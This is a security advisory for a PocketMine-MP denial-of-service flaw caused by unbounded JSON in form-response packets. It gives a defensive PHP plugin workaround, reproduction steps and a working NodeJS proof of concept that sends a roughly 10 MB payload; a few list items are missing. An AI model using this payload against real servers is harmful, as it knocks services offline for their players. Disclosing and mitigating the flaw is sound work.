The server does not meaningfully limit the size of the JSON payload in ModalFormResponsePacket. This can be abused by an attacker to waste memory and CPU on an affected server, e.g. by sending arrays with millions of elements.
The player must have a full session on the server (i.e. spawned in the world) to exploit this, as form responses are not handled unless the player is in game.
The issue was fixed in two parts:
This issue can be worked around in a plugin using DataPacketReceiveEvent by:
formData field

However, a full workaround for the issue would require reflection to access the Player->forms property, which is not exposed via any accessible API prior to 5.39.2.
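As an added example (not code from this advisory or from PocketMine-MP itself), a minimal plugin implementing the workaround described above: it listens for DataPacketReceiveEvent, cancels any ModalFormResponsePacket whose formData field is oversized, and, using the reflection the advisory mentions, also drops responses for form IDs the player was never sent. The plugin namespace, the 64 KiB limit and the hasPendingForm helper are assumptions for illustration.

```php
<?php
declare(strict_types=1);

namespace example\formguard; // hypothetical plugin namespace

use pocketmine\event\Listener;
use pocketmine\event\server\DataPacketReceiveEvent;
use pocketmine\network\mcpe\protocol\ModalFormResponsePacket;
use pocketmine\player\Player;
use pocketmine\plugin\PluginBase;

final class Main extends PluginBase implements Listener{

	/** Assumed upper bound for a legitimate form response; real responses are at most a few hundred bytes. */
	private const MAX_FORM_DATA_BYTES = 64 * 1024;

	protected function onEnable() : void{
		$this->getServer()->getPluginManager()->registerEvents($this, $this);
	}

	/**
	 * DataPacketReceiveEvent fires before the packet handler runs, so cancelling
	 * here stops the server from ever json_decode()-ing the formData string.
	 */
	public function onDataPacketReceive(DataPacketReceiveEvent $event) : void{
		$packet = $event->getPacket();
		if(!$packet instanceof ModalFormResponsePacket){
			return;
		}
		$session = $event->getOrigin();

		// Partial workaround: size-check the raw formData string. strlen() is O(1)
		// in PHP, so this costs nothing even for a multi-megabyte payload.
		if($packet->formData !== null && strlen($packet->formData) > self::MAX_FORM_DATA_BYTES){
			$event->cancel();
			$session->disconnect("Form response too large");
			return;
		}

		// Full workaround: reject responses to forms the player was never sent, so an
		// attacker cannot keep replaying under-limit payloads against bogus form IDs.
		$player = $session->getPlayer();
		if($player !== null && !$this->hasPendingForm($player, $packet->formId)){
			$event->cancel();
		}
	}

	/**
	 * Player->forms is not reachable through public API before 5.39.2, so it is
	 * read via reflection. Assumed: the property is an array keyed by form ID.
	 */
	private function hasPendingForm(Player $player, int $formId) : bool{
		$property = new \ReflectionProperty(Player::class, "forms");
		$property->setAccessible(true); // harmless no-op on PHP 8.1+
		$forms = $property->getValue($player);
		return is_array($forms) && isset($forms[$formId]);
	}
}
```

The size check alone is a cheap, version-independent mitigation; the reflection part is fragile by nature (it depends on a non-public property name and shape), so treat it as a stopgap until the server is updated to 5.39.2.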
1. Join a PocketMine-MP server as a regular player (no special permissions needed).
2. Use a modified client or packet-sending script to send a ModalFormResponsePacket with:
   - formId: any value (the PoC below uses a nonexistent form ID)
   - formData containing a massive JSON array (e.g., 10+ MB payload).
3. The server will attempt to parse the JSON and may freeze or become unresponsive.
Example NodeJS pseudocode (field names are illustrative; check the packet definition for your bedrock-protocol and protocol version):

```javascript
import { createClient } from 'bedrock-protocol';

const host = '127.0.0.1';
const port = 19132;
const username = 'Test';

// Connect as an ordinary offline-mode player; no permissions are needed.
const client = createClient({
  host,
  port,
  username,
  offline: true
});

// A ~10 MB JSON array with five million elements.
const hugePayload = '[' + '0,'.repeat(5_000_000) + '0]';

// Form responses are only handled once the player has spawned in the world.
client.on('spawn', () => {
  console.log('[*] Connected & spawned. Sending malicious packet...');
  client.write('modal_form_response', {
    formId: 9999, // nonexistent form
    formData: hugePayload // huge JSON
  });
});
```
Patched version: 5.39.2

CVSS 4.0 score: 7.1 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)

| Metric group | Values |
| --- | --- |
| Exploitability | AV:N, AC:L, AT:N, PR:L, UI:N |
| Vulnerable System | VC:N, VI:N, VA:H |
| Subsequent System | SC:N, SI:N, SA:N |